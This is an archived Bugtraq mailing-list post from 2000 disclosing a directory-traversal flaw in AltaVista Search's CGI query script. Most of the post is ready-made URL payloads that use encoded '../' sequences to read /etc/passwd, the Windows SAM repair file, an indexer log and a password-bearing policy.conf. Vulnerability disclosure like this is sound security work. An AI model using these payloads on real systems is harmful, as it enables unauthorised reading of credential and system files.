[13307] in bugtraq
Altavista followup
daemon@ATHENA.MIT.EDU (rudi carell)
Tue Jan 11 01:23:41 2000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-Id: <20000109153704.76319.qmail@hotmail.com>
Date: Sun, 9 Jan 2000 07:37:04 PST
Reply-To: rudi carell <rudicarell@HOTMAIL.COM>
From: rudi carell <rudicarell@HOTMAIL.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
hola,
more bugs in the AV-Search thing ..
using uri-encoded strings it is possible to view "any" file on the system ..
examples:
unixxxsss ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
or on an micro$oft IIS ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._
interesting infos about the file structure ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log
or another file which does contain the password ..
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf
altavista told me that this is(was) just a flavour of the "old" bug and its
fix is(was) included in the last secpatch.
whatever ....
nicedays :-/
RC
rudicarell@hotmail.com
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
